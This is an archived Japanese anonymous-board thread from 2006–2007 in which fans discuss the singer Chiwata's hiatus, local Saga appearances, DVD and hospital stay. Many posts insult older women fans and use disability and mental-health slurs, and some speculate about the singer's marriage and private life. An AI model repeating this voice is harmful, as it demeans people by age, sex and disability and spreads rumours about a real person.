わざわざお知らせしてくれてるんだから、暇なおばさんたち行ってあげたら喜ぶよ。きゃあきゃあ騒ぎすぎて、高校生に顰蹙かわないようにね!

330 :NO MUSIC NO NAME:2006/11/16(木) 18:36:34 ID:0rjClIQW
( ・ ∀ ・ )ゴマキで〜す

331 :NO MUSIC NO NAME:2006/11/16(木) 21:35:39 ID:nqHEIhsT
自分のペースで活動したいっていう千綿だし、
本人の故郷だし、国体にも思い入れあるだろうし、
とっても「らしい」第一歩だなぁって私は思った。
その第一歩の時間を共有できる人が羨ましい。
そっか、髪切った後のインストアって…「憂世」聴きたくなった。

332 :NO MUSIC NO NAME:2006/11/17(金) 02:44:01 ID:c2BFPF/B
暖色系のマフラーした女が
最前列で隠し撮りをしていた
あのインストアか。
なつかしい。


333 :NO MUSIC NO NAME:2006/11/17(金) 12:47:14 ID:MDN5Vlwu
常連も握手の時にデジカメで撮ってたと聞いたけどね

334 :NO MUSIC NO NAME:2006/11/17(金) 20:26:15 ID:4YR59WVr
もうマフラーの季節か!

335 :NO MUSIC NO NAME:2006/11/18(土) 05:01:28 ID:9Tk/sZN8
昨日会場に行けた人ラッキーでしたね。
どんな曲だったんだろ。

336 :NO MUSIC NO NAME:2006/11/18(土) 10:39:47 ID:eUue4egh
狙って行ってるんだから、ラッキーとは違うと思うw
曲も発表してくれるといいね。

337 :NO MUSIC NO NAME:2006/11/19(日) 08:09:29 ID:00tcnJFh
千綿、唄ったらしいね。

338 :NO MUSIC NO NAME:2006/11/19(日) 12:15:58 ID:KdA3fwp/
がんばったから観れたんなら
観れなかった人は普段から手抜きしてるんだね
あいつらの辞書には心遣いは載ってないようだ


339 :NO MUSIC NO NAME:2006/11/19(日) 17:44:58 ID:faZ8BQaM
期待する方が間違ってるw
惑わされてる人の目も覚める?w

340 :NO MUSIC NO NAME:2006/11/20(月) 22:47:40 ID:MQJkKLHl
人って誤解するもんだから、少ない情報と自分の思い込みで誰かを判断すると世間を狭くするし自分も不幸になると思う。人の欠点ばかり見つけたり疑ってばかりいると、誰かを好きになることが出来なくなる気がする。

341 :NO MUSIC NO NAME:2006/11/21(火) 00:24:01 ID:rNm4b3SL
更年期だからスルーすればいいのでゎ

342 :NO MUSIC NO NAME:2006/11/21(火) 23:28:48 ID:WfEcDnWo
本人・軍団 乙

343 :NO MUSIC NO NAME:2006/11/22(水) 03:04:22 ID:O2ezy0BS
唄会最終幕のDVD出るね

344 :NO MUSIC NO NAME:2006/11/22(水) 08:22:49 ID:Yp9/Zw26
プロファイル

345 :NO MUSIC NO NAME:2006/11/22(水) 22:25:58 ID:GNdqjrKb
SONGSのHPに千綿のコメントアップされてたよ。
写真もあった。公式よりラフな感じ。

346 :NO MUSIC NO NAME:2006/11/23(木) 13:21:59 ID:qnwseJiv
DVDのセットリストを見て思った。
信じていていいんだなって。
信じていられるって、しあわせだなって。
届くのが待ち遠しいなあ。

347 :NO MUSIC NO NAME:2006/11/23(木) 14:06:50 ID:FmQteW3R
千綿がすべて。。。なりたくないね

348 :NO MUSIC NO NAME:2006/11/23(木) 17:31:45 ID:BIkFTuZg
千綿がすべて。。。ね。
あと3年ぐらい千綿が帰ってこなかったら気狂うんだろうなw

こわっ

349 :NO MUSIC NO NAME:2006/11/23(木) 23:59:19 ID:qnwseJiv
ここ見てるという時点でw

350 :NO MUSIC NO NAME:2006/11/24(金) 00:00:12 ID:qnwseJiv
おんなじじゃんw

351 :NO MUSIC NO NAME:2006/11/24(金) 00:08:25 ID:FmQteW3R
メンヘラー多いよね
ライブに行かないと生きていけないみたいな

352 :NO MUSIC NO NAME:2006/11/26(日) 23:13:57 ID:QX6eX+Yx
現実が悲惨すぎて逃避しないと生きていけないのだよ。
不安と寂しさを妄想と擬似恋愛でまぎらわしても、現実はどんどん老いて醜くなっていく自分がいるだけw

353 :NO MUSIC NO NAME:2006/11/26(日) 23:31:47 ID:GNErV18R
自分はがんばっていると思い込み激しい人が多いね
方向が間違ってると言うか
まわりに迷惑かけててもきづいてないし


354 :NO MUSIC NO NAME:2006/11/27(月) 22:22:54 ID:YCSvsJ2k
自分の視点で人を決め付け、見下すモノの見方で断定するって…
ホントお局&姑クオリティ高いよなw

355 :NO MUSIC NO NAME:2006/11/28(火) 00:18:02 ID:2Pj8HdD/
さすがメンヘラー

356 :NO MUSIC NO NAME:2006/11/28(火) 23:38:37 ID:2Pj8HdD/
肩におばさんの怨念がのっかってる状況じゃ活動したくないだろう

357 :NO MUSIC NO NAME:2006/12/02(土) 00:11:41 ID:b6GNR9y/
プロファイルって大阪のおばちゃんがブログで言ってた。
>301は大阪のおばちゃんですね。




358 :NO MUSIC NO NAME:2006/12/02(土) 02:29:45 ID:E0e9Iq0z
そんなブログがあるの?
まさか本人ではないよね?

359 :NO MUSIC NO NAME:2006/12/03(日) 14:09:52 ID:ei8NnfoO
他人の視点を気にしないで、自分の幸せをがんばってる人
いまだにマルチもどきやってるのとか、お気にホストをNo.1にするのが幸せなんて言ってるのとか、胡散臭い教祖様に全財産寄付するのとか
メンヘラー率高し


360 :NO MUSIC NO NAME:2006/12/03(日) 21:56:16 ID:aqmpBJ0Q
目がやばい人が多いね


361 :NO MUSIC NO NAME:2006/12/05(火) 20:56:01 ID:iveq/WvP
今日は冴えた満月がとても綺麗だ。
BGMは「満月と夜の詩」だなぁ。

362 :NO MUSIC NO NAME:2006/12/05(火) 23:58:34 ID:w5CQBcxv
プロファイル

363 :NO MUSIC NO NAME:2006/12/06(水) 07:36:36 ID:kAWuMmpO
sage


364 :NO MUSIC NO NAME:2006/12/06(水) 15:40:06 ID:mUgbp4dO
突然だが、ワンマンでキーボードやハープを演奏したことあったけど
あの下手さは腹が立ったのを思い出した。vv
素人お遊戯並の演奏、ワンマンでやることじゃないよな〜。
FCイベントで隠し芸的に見せるなら「なかなかやるじゃん」なんだけどさ。

ブログに見える相変わらずの理屈っぽさ、こじつけ野郎加減に
復活の先行き暗そう・・・と思ってしまう。

365 :NO MUSIC NO NAME:2006/12/06(水) 18:02:36 ID:mRyyABWK
>364
ほんとにファン?

366 :NO MUSIC NO NAME:2006/12/06(水) 19:46:49 ID:7VZrk6qs
千綿に何を求めてるんだか

367 :NO MUSIC NO NAME:2006/12/06(水) 23:45:20 ID:Z93KY/kk
赤心みたいな頭悪そな批評
まさか赤心?

368 :NO MUSIC NO NAME:2006/12/07(木) 04:18:14 ID:NT6zvatU
っぽいね。
いるんだよなー、悪く言えるのが親しい証拠みたいな大勘違い人間。
理屈っぽくこじつけるって、単なるお前の感想だ。

369 :NO MUSIC NO NAME:2006/12/07(木) 05:12:03 ID:oDxNLsf0
>365
ほんとにファン!
だってsagaだなんて、かわいい!

370 :NO MUSIC NO NAME:2006/12/08(金) 20:38:18 ID:wbogBZwH
ネットやブログが発展したおかげで勘違い人間増えたよね
お得意様だから相手してもらえてるだけなのにw
がんばってお金ためて、復活したらまたお金使ってね

371 :NO MUSIC NO NAME:2006/12/08(金) 22:15:30 ID:SgiUwkd0
散々花火の時の甥っ子の事で千綿にウダウダ書いといて
何事もないように佐賀総体に行って浮かれてるおばさんとか

372 :NO MUSIC NO NAME:2006/12/08(金) 23:37:39 ID:RDutWA1L
あっちの千綿スレって無くなったの?何だかこっちのカキコが
微妙に増えたような気が・・・

373 :NO MUSIC NO NAME:2006/12/11(月) 01:20:03 ID:nI00ZNdx
大切な人&犬を亡くした人に対して年賀状要求するなよな…。

374 :NO MUSIC NO NAME:2006/12/11(月) 02:15:02 ID:6kG2c516
え? 要求した人がいるの? kwsk

375 :NO MUSIC NO NAME:2006/12/16(土) 01:54:55 ID:MFk8h2eb
あっとでダイジェスト見れるよあげ

376 :NO MUSIC NO NAME:2006/12/16(土) 02:25:08 ID:U8vhbIeq
>375
見た見た。最後のファンの映像はDVDにも入ってるんだろか。

377 :NO MUSIC NO NAME:2006/12/17(日) 12:34:44 ID:SnD9UVWC
不細工なファンのコメントなんてイラネ

378 :NO MUSIC NO NAME:2006/12/17(日) 14:14:12 ID:hQZTGW/0
青い柄のシャツ来た男って
いつもライブ中に騒いで周りに迷惑かけてる人だお

379 :NO MUSIC NO NAME:2006/12/17(日) 23:33:36 ID:iARQSQ+O
最終幕からもう5ヶ月になるんだね
時間は確実にどんどんと過ぎてますね
さて来週はクリスマスで、再来週には今年も終わりだ
千綿も新しい旅に出たみたいだし
2007年を気持ち良く迎えるためにも、残り少ない今年をがんばろう

380 :NO MUSIC NO NAME:2006/12/18(月) 02:09:29 ID:N7aaP6JA
自分のブログに書きゃいいものを

381 :NO MUSIC NO NAME:2006/12/20(水) 00:04:28 ID:BEr6nczO
あっとのダイジェストでコメントするキモ中年たち見てて
千綿のやめたくなった気持ちが少しわかったw
ttp://www.mainichi-msn.co.jp/shakai/jiken/news/20061208k0000m040088000c.html

382 :NO MUSIC NO NAME:2006/12/20(水) 11:10:34 ID:gSzVyVAk
ファンが望んであの中年ばっかりのシーン挿入みたいだね
感想はありがとうか殆どだし
千綿、終わったな

383 :NO MUSIC NO NAME:2006/12/20(水) 14:48:52 ID:W/XP69lp
>381
で、その記事が何か?んなもん引用してまで言うことか?
中年じゃなくて老年やんw


384 :NO MUSIC NO NAME:2006/12/21(木) 02:32:41 ID:HQgcpz8m
「当たり」にはもう1枚?勝手な妄想してみるorz



385 :NO MUSIC NO NAME:2006/12/21(木) 23:20:01 ID:J5XFzCJE
>381
お前より下の年齢のヤツから見りゃお前も同じだよw
自分は違うって思えるって幸せだよな。

386 :NO MUSIC NO NAME:2006/12/21(木) 23:30:29 ID:W5yqx6yf
更年期 老人話に過剰反応するのはどうかと

387 :NO MUSIC NO NAME:2006/12/22(金) 09:17:31 ID:pwxYMX4E
すっかり消えたインディーズ板と同じ流れだな
更年期移民しすぎw

388 :NO MUSIC NO NAME:2006/12/22(金) 18:29:31 ID:Tit4Ckin
やっと旅から帰ってきたか

389 :NO MUSIC NO NAME:2006/12/23(土) 17:28:33 ID:0DifMygc
旅日記の連載が嬉しいな。
充実した旅だったんだな〜。

390 :NO MUSIC NO NAME:2006/12/23(土) 22:09:46 ID:vhGEusLq
プロファイル

391 :NO MUSIC NO NAME:2006/12/24(日) 01:01:01 ID:Z5105twf
…己の無知っぷり曝し乙
強粘着・お局姑街道まっしぐらだなw

392 :NO MUSIC NO NAME:2006/12/24(日) 02:11:48 ID:rzK6s3Eb
プロファイル

393 :NO MUSIC NO NAME:2006/12/24(日) 20:36:05 ID:Z5105twf
揚げ足取りじゃなくて自爆指摘ってまだ気付けないんだねw

394 :NO MUSIC NO NAME:2006/12/24(日) 23:15:49 ID:rzK6s3Eb
プロファイル

395 :NO MUSIC NO NAME:2006/12/25(月) 00:09:34 ID:pyatxorb
池沼乙

396 :NO MUSIC NO NAME:2006/12/25(月) 00:33:53 ID:z3CZ+pJS
プロファイル使ったおばさんごくろうさん

397 :NO MUSIC NO NAME:2006/12/25(月) 03:48:30 ID:c1uURuZP
DVDはまだ届かないけど
0時ジャストのメッセージ嬉しかったっす。

398 :NO MUSIC NO NAME:2006/12/25(月) 13:23:28 ID:pyatxorb
うちは、昨日届いてたけど、これは早いほうなのか?

399 :NO MUSIC NO NAME:2006/12/26(火) 23:34:28 ID:RBmpPU3O
歌えなくなったのはやはりペットロスが原因か。先は長いな。

400 :NO MUSIC NO NAME:2006/12/27(水) 04:07:37 ID:X/ET0JMz
今日の雨はひときは「rain」がしみる。

401 :NO MUSIC NO NAME:2006/12/27(水) 11:22:16 ID:i92TZeH/
プロファイル

402 :NO MUSIC NO NAME:2006/12/28(木) 02:21:36 ID:I1Nj2jjg
石垣 竹富に行くイタヲタが多発の予感



403 :NO MUSIC NO NAME:2006/12/28(木) 11:34:39 ID:G/8ppokg
あの島を前から好きでした自慢が始まってます

404 :NO MUSIC NO NAME:2006/12/28(木) 16:02:16 ID:MSbeCghL
Hは今週末に行くらしい

405 :NO MUSIC NO NAME:2006/12/29(金) 11:52:33 ID:Vx1CzclQ
あの指の形........
佐賀総体でしたの? それとも........

406 :NO MUSIC NO NAME:2006/12/29(金) 14:56:31 ID:j4bixPZW
なんかさ、ダメ人間じゃね?補導されるなんてさ。しかも悪びれた様子まるでなし。

407 :NO MUSIC NO NAME:2006/12/30(土) 05:30:52 ID:23+BcfsQ
そんなトコがいいんぢゃん!

408 :NO MUSIC NO NAME:2006/12/30(土) 11:48:00 ID:3SesvOQi
ぢゃんて、、、

409 :NO MUSIC NO NAME:2006/12/30(土) 11:58:20 ID:zp+Bhe2W
補導とは未成年者に使用する言葉。正確には、島民から不審者がいると通報受け出動した警官が、野宿をしていた34歳無職の男性に職務質問と注意指導して、最寄りの宿に送り届けたw
南の島ではこんな人間や出来事は日常茶飯事

410 :NO MUSIC NO NAME:2006/12/30(土) 12:31:00 ID:3SesvOQi
千綿が馬鹿だと?

411 :NO MUSIC NO NAME:2006/12/30(土) 18:11:08 ID:Ar7bFZiJ
夜のピクニック大コケだったらしいな。

412 :NO MUSIC NO NAME:2006/12/31(日) 01:32:06 ID:PJi+NRKf
とあるH軍団には評判いいのに?
H軍団はとあるが好きね
で、手の形の謎は解けた?
千綿のカノが軍団九州支部とつながってるでFA

413 :NO MUSIC NO NAME:2006/12/31(日) 21:07:49 ID:AQ96Ek0t
旅日記ぶじ年内完成だな。
まるで一緒に旅行させてもらってたみたいで楽しめた。

414 :NO MUSIC NO NAME:2007/01/03(水) 19:28:55 ID:BulBJCxw
千綿目当てで年末年始佐賀滞在ヲタ コワ

415 :NO MUSIC NO NAME:2007/01/07(日) 01:26:54 ID:2ud3QZaM


416 :NO MUSIC NO NAME:2007/01/07(日) 12:56:29 ID:mCK4Lop1
千綿は佐賀滞在中なの?

417 :NO MUSIC NO NAME:2007/01/10(水) 03:53:20 ID:lzdfYrlh
のだめを涙流して見た人はアスペの疑いアリ
千綿休業で欝状態の人もアスペに当てはまる


418 :NO MUSIC NO NAME:2007/01/10(水) 15:20:00 ID:g7pykmxb
↑覚えたての言葉を使いたくてしかたないオバ

419 :NO MUSIC NO NAME:2007/01/10(水) 22:35:32 ID:OkNZN4in
当たりは出たの?

420 :NO MUSIC NO NAME:2007/01/12(金) 21:13:15 ID:BfHnlSlJ
在庫にあったりして…

421 :NO MUSIC NO NAME:2007/01/14(日) 07:25:59 ID:PH80uzUe
2ちゃんねる終了

422 :NO MUSIC NO NAME:2007/01/16(火) 14:38:50 ID:ZGtTfN0l
チワタもオワタ

423 :NO MUSIC NO NAME:2007/01/16(火) 21:01:24 ID:clzlQKbf
ruleってホント神盤だよな

424 :NO MUSIC NO NAME:2007/01/16(火) 21:58:12 ID:vn53uzPA
そうか?

425 :NO MUSIC NO NAME:2007/01/16(火) 22:33:22 ID:mFZedSMO
唄会〜LIVEは?

426 :NO MUSIC NO NAME:2007/01/17(水) 15:08:13 ID:yk+KLhpF
唄会の方が神盤だな

427 :NO MUSIC NO NAME:2007/01/17(水) 19:08:39 ID:/aCcKNaB
もっとLIVE盤を出してほしかった

428 :NO MUSIC NO NAME:2007/01/20(土) 23:28:02 ID:w5Eu8uZn
千綿ってインディーズなんじゃないの?

429 :NO MUSIC NO NAME:2007/01/21(日) 01:12:47 ID:VOSXdKUD
カツルミちゃんのライブな行ったのに
外に出ないと書く千綿あげ

430 :NO MUSIC NO NAME:2007/01/21(日) 21:12:10 ID:/Kinm6Xq
日本語でおk

431 :NO MUSIC NO NAME:2007/01/21(日) 22:06:05 ID:gwYfagXj
18日には外に出なかったってことか。
ライブ行ったとか書くと、ヲタが殺到するからかw

432 :NO MUSIC NO NAME:2007/01/22(月) 23:52:29 ID:rJrpHIfK
おばさんでもファンが多い方が活動の足しにはなるんじゃないのかな?
ファン同士の悪口言ってるより今は売れる方が先決かと思うけど・・・。


433 :NO MUSIC NO NAME:2007/01/23(火) 19:11:32 ID:/wA2/Pqs
おばさんはこわいから新規ドン引き

434 :NO MUSIC NO NAME:2007/01/24(水) 00:26:43 ID:K0cf990r
そんなに怖くないと思うけど
何かされた?

435 :NO MUSIC NO NAME:2007/01/24(水) 01:00:44 ID:XWwqmWCj
再生産には当たりないのかなあ?

436 ::2007/01/24(水) 03:43:37 ID:atoKACDe
優雅だなぁ

437 :NO MUSIC NO NAME:2007/01/25(木) 04:29:37 ID:Z5V/z+1E
泣きながら大声で歌うおばさんや
子供をダシに千綿に手を振るおばさん



438 :NO MUSIC NO NAME:2007/01/25(木) 09:44:14 ID:eRKBiiO/
Mステとかのテレビの観覧募集に年齢制限がある理由は、見た目の汚さとメンヘルを悪化させていてトラブルをおこす人が多いから
十代ならまだしも、年とってから追っかけし出す人はかなりヤバイ

439 :NO MUSIC NO NAME:2007/01/26(金) 21:52:11 ID:9ek6lMTF
噂のメンヘルですが、なにか?
いけないことしましたか?


440 :NO MUSIC NO NAME:2007/01/26(金) 23:12:10 ID:XvOWxAqD
そいえば…Mちょさん、ピンマフさん、どしてるだろ。

441 :NO MUSIC NO NAME:2007/01/31(水) 02:55:57 ID:z/1BrUi6
ほしゅ

442 :NO MUSIC NO NAME:2007/02/01(木) 11:36:06 ID:Vij/UGPC
大阪のおばちゃん
チワタに復活前に
必死にダイエットw

443 :NO MUSIC NO NAME:2007/02/01(木) 12:43:23 ID:0jmFzrwR
わしも見習わんとなあ。

444 :NO MUSIC NO NAME:2007/02/01(木) 18:20:21 ID:FB9ZvSps
また軍団対決か?
ヒサコ対大阪のおばちゃんかい?

ダイエットはいいじゃない?
大阪のおばちゃんが誰かわからない


それよか千綿が豚カツ屋でバイトしてるみたいな
意味深な書き方してる
九州支部の方がイタタじゃないの?

かなりメンヘルだよね

445 :NO MUSIC NO NAME:2007/02/01(木) 22:00:00 ID:069JvxUT
もっとイタタがいる。

446 :NO MUSIC NO NAME:2007/02/02(金) 00:31:49 ID:wVKRvW4M
>444
え〜?
あれは違う人のことじゃないのぉ?

447 :NO MUSIC NO NAME:2007/02/02(金) 00:39:03 ID:weZiyKlO
千綿のコトっぽく書いてない?
あ、メンヘル特有の“あの人“が自分で混乱してわからなくなってるってコト?



448 :NO MUSIC NO NAME:2007/02/02(金) 01:38:45 ID:yMluO6dv
>447
ぽいけど…チワタのことだったらブログに書いちゃマズイだろう

449 :NO MUSIC NO NAME:2007/02/02(金) 02:24:09 ID:weZiyKlO
軍団特有の黙っていられないー 自慢したいーか
モノホンのメンヘラーと思ってました

450 :NO MUSIC NO NAME:2007/02/02(金) 03:24:41 ID:qmGpnswk
ミナミの仕事って?

451 :NO MUSIC NO NAME:2007/02/03(土) 21:19:38 ID:KQOxooSV
財津元マネはFABのブッキングマネージャーになったの?
ヒサコ必死だな


452 :NO MUSIC NO NAME:2007/02/04(日) 00:38:30 ID:kLglbV8o
夢中になれることがあるってスバラシイことぢゃないか!

453 :NO MUSIC NO NAME:2007/02/04(日) 02:04:45 ID:rl+WyVUK
軍団はヒサコマンセ

454 :NO MUSIC NO NAME:2007/02/04(日) 13:07:06 ID:cW0E2iP2
軍団に囲い込まれて潰される。

455 :NO MUSIC NO NAME:2007/02/05(月) 20:08:06 ID:jX3r5f/W
潰されるもなにも自分で墓穴掘るメンヘルだから
カフェインだめってモロじゃん

456 :NO MUSIC NO NAME:2007/02/06(火) 04:15:22 ID:Wh9szzh8
潰されるのは千綿

457 :NO MUSIC NO NAME:2007/02/06(火) 08:41:49 ID:beQyuZX7
アイスキューブも軍団加入ですね

458 :NO MUSIC NO NAME:2007/02/09(金) 22:25:53 ID:8f5u2uj8
千綿は今どこを旅してるんだろ?

459 :NO MUSIC NO NAME:2007/02/09(金) 22:56:30 ID:8tPB5Oml
今日は佐賀でライブでした

460 :NO MUSIC NO NAME:2007/02/10(土) 00:21:18 ID:0q6vl+XK


461 :NO MUSIC NO NAME:2007/02/10(土) 00:41:42 ID:0fxuvrbc
地元イベ?

462 :NO MUSIC NO NAME:2007/02/10(土) 03:44:53 ID:Yey3OcJ8
ttp://mixi.jp/view_bbs.pl?id=838234&comm_id=28035

463 :NO MUSIC NO NAME:2007/02/10(土) 03:46:40 ID:0q6vl+XK
なんだかなぁ

464 :NO MUSIC NO NAME:2007/02/10(土) 19:38:56 ID:me3nXS51
結局地元密着アーティストに成り下がりか。糸冬

465 :NO MUSIC NO NAME:2007/02/10(土) 19:54:32 ID:0q6vl+XK
軍団は知ってたようだね

466 :NO MUSIC NO NAME:2007/02/10(土) 22:51:22 ID:tuBSsNj1
なんで?

467 :NO MUSIC NO NAME:2007/02/11(日) 09:54:48 ID:QJQ4RtlS
>462
kwsk

468 :NO MUSIC NO NAME:2007/02/11(日) 22:16:20 ID:s6wPg3ZN
チワタオワタ

469 :NO MUSIC NO NAME:2007/02/11(日) 22:42:24 ID:9AbXW4UV
自分が行けなかったからって終わったとか言うイタヲバ ワロス

470 :NO MUSIC NO NAME:2007/02/12(月) 00:26:33 ID:imWagCJy
「イタヲタ」が、どんな人を指すのか分からないが!?
「チワタオワタ」と思う奴は「千綿」というスレに粘着しなくても良いのでは!?
千綿はこれからの人!これから音楽界に一世風靡するであろう人物。
期待して待とう!そろそろ景気もよくなり第二次バブル期到来の予感。
この波にのれ!!ヲタもイタヲタも「千綿」を応援しようではないか!!


471 :NO MUSIC NO NAME:2007/02/12(月) 01:59:17 ID:gf999rOE
きんもー☆

472 :NO MUSIC NO NAME:2007/02/12(月) 03:00:44 ID:Na5LXvzo
40代のバブルひきずった現在チュプの時代が止まってるおばさん きんも☆

473 :NO MUSIC NO NAME:2007/02/12(月) 20:43:27 ID:tU7NboAY
もう終わったな

474 :NO MUSIC NO NAME:2007/02/12(月) 21:00:59 ID:XjJoHMOK
オワタ\(^0^)/

475 :NO MUSIC NO NAME:2007/02/12(月) 21:41:03 ID:XmsQxesV
自分がオワってるヲバは現実逃避に必死だなw
見た目は汚婆でも、心は夢見る乙女w
たまには現実も見ようね

476 :NO MUSIC NO NAME:2007/02/13(火) 00:37:29 ID:Fs0FIBGa
>465
軍団行ってたの?部外者が行っていいの?


477 :NO MUSIC NO NAME:2007/02/13(火) 09:52:05 ID:E/aq4V0E
>476
部外者は入れないよ。
たぶんそのイベ参加者のブログを発見したんでない?

母校の高校文化祭飛び入りの次は、母校の中学の創立記念行事のゲストっすか〜。
しかもアコギを三本寄贈ってかー?
いんやぁ〜、千綿さまって太っ腹!!!!
遠恋の嫁と結婚したし、夢駆という足枷が無くなったし、
子供育てる環境のいい佐賀に引っ越すのもいいんでないかい。
佐賀ならきっと大スターだしさ。
高校、中学に続き母校の小学校にも何か恩返しできるぞ〜。
校歌なんてどうよ?大物じゃん。vv
楽しい隠居生活だね〜、千綿さま。

478 :NO MUSIC NO NAME:2007/02/13(火) 10:18:06 ID:LL+Mili4
おばさん、、、、、
更年期ヒドス

479 :NO MUSIC NO NAME:2007/02/13(火) 14:40:13 ID:009XgAgc
>477
怖っ★


480 :NO MUSIC NO NAME:2007/02/14(水) 11:40:28 ID:kw3E/7/K
遠恋の人=佐賀の人との結婚説を言い続けてるおばさん
長い間付き合えば責任を取らなければならないと考えるおばさんクオリティ

結局、その話をしてるのってひとりのおばさん説があるがどうよ?

481 :NO MUSIC NO NAME:2007/02/14(水) 18:20:07 ID:XsSwS7LW
>>480
じゃあひとりそうやって「千綿は独身だから」と夢見続ければいいんじゃない?
ちなみに俺は>>477じゃないぞ 

482 :NO MUSIC NO NAME:2007/02/14(水) 19:23:40 ID:kw3E/7/K
おばさん、もうわかったよ
更年期、ごくろーさん

別に千綿が結婚しててもいいんだよ

ただヒステリックなおばさんがきもいだけ

483 :NO MUSIC NO NAME:2007/02/14(水) 23:36:07 ID:z2D1I0Bj
入院してたんだ〜
退院おめ!


484 :NO MUSIC NO NAME:2007/02/15(木) 00:12:49 ID:vzZplzAd
入院するのにわざわざデジカメを持ち込んだのか?
それとも病院内なのに携帯使ったのか?
どちらにしてもそんなに体調悪かったのに写真撮る余裕はあったんだなw

485 :NO MUSIC NO NAME:2007/02/15(木) 00:25:51 ID:q/HRm68m
看病してくれる女性に持ってきて貰ったんでしょw

486 :NO MUSIC NO NAME:2007/02/16(金) 19:55:26 ID:dIim4oUW
女とか妻とか書いて確認したいんだよね?

軍団に入ればわかるよ

487 :NO MUSIC NO NAME:2007/02/16(金) 20:28:48 ID:7VYPg/5k
みんな、千綿のこと心配じゃないの?こんな時くらい、素直に体調の心配しようよ。いつも言いたい放題なんだからさ。

488 :NO MUSIC NO NAME:2007/02/16(金) 21:06:18 ID:dIim4oUW
こわい、、、。

489 :NO MUSIC NO NAME:2007/02/19(月) 21:12:29 ID:kuH6P5wC
ヤバイ病気じゃないといいけど。。


490 :NO MUSIC NO NAME:2007/02/20(火) 00:47:52 ID:BBMUv5KP
入院してたのには驚いたけど、バレンタインは自宅ですごせたみたいで良かった

バレンタイン前後に荒らしてしまう更年期おばさんって、よっぽど寂しいんだね

491 :NO MUSIC NO NAME:2007/02/20(火) 08:47:43 ID:2KUpoX/r
佐賀でしか聞けないCD…どんな曲かな?ジャケットの空がいいね。

492 :NO MUSIC NO NAME:2007/02/20(火) 11:49:41 ID:fz9vn0Ld
あの空にあのフォントは変だ
いかにも無料配布なデザイン

493 :NO MUSIC NO NAME:2007/02/20(火) 18:47:02 ID:JpI907Yk
所詮佐賀県民の血税使って作り上げた配布CDだ
クオリティーなんてそんなもんだろう

494 :NO MUSIC NO NAME:2007/02/21(水) 21:11:30 ID:uYUq+v3D
限定とはいえ新しい音源は喜ばしい
そろそろ重大発表しないかな?たとえば再来月の35回目の記念日にでも

495 :NO MUSIC NO NAME:2007/02/21(水) 23:34:56 ID:TYDqopOD
今回も軍団は千綿イン佐賀に行ったようだね

とある人から聞いてしまいました

軍団に入りたくなった

496 :NO MUSIC NO NAME:2007/02/22(木) 00:40:39 ID:ZXTW0aE9
別に今回のは軍団じゃなくても行けただろう?
事前にあれだけmixiに情報出ていたんだから

497 :NO MUSIC NO NAME:2007/02/22(木) 01:01:07 ID:zHIvCCZG
Hは佐賀に行ったらしいよ

498 :NO MUSIC NO NAME:2007/02/22(木) 01:53:13 ID:dtzTws/N
行けなかったからってひがむなよww

499 :NO MUSIC NO NAME:2007/02/22(木) 02:49:50 ID:uiUa03Tx
何のイベントのこと?

500 :NO MUSIC NO NAME:2007/02/22(木) 11:26:20 ID:CoTLNw1N
500ゲト!
佐賀で1時間半歌った時のこと?結局関係ない一般人でもはいれたってこと?

501 :NO MUSIC NO NAME:2007/02/22(木) 13:16:49 ID:FI1AWEPJ
佐賀で一部の人しか見れないってライブが又あったの〜?
元歌手wのライブのどこがいいのやら。。。
ライブやったり制作したりと音楽と離れてない人と、
音楽から離れてしまった人のライブなんて雲泥の差だよ。
「腕に覚えのある」人が「昔取った杵柄」で「茶を濁す」てなもんだろ。
どうせ聞くのは千綿のライブを聞いたことないのと、
どんな手を使ってもライブを見るマンセーなヲタだけ。
きっちり復活した千綿のライブを見れりゃいいや〜。

502 :NO MUSIC NO NAME:2007/02/22(木) 19:50:32 ID:uiUa03Tx

白詐欺か?ワラ

503 :NO MUSIC NO NAME:2007/02/22(木) 20:13:03 ID:5Hfeli9x
一般人も見ていいライブなら告知するでしょ。
推進大会も内緒のゲストだから告知できないなりに
「出るぞ」ってもろバレしてくれてたじゃん。

504 :NO MUSIC NO NAME:2007/02/23(金) 11:19:23 ID:wwkZJ37+
おやっ。

505 :NO MUSIC NO NAME:2007/02/23(金) 20:25:23 ID:0zpusFiC
昼の更年期おばさん、こわい

76 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)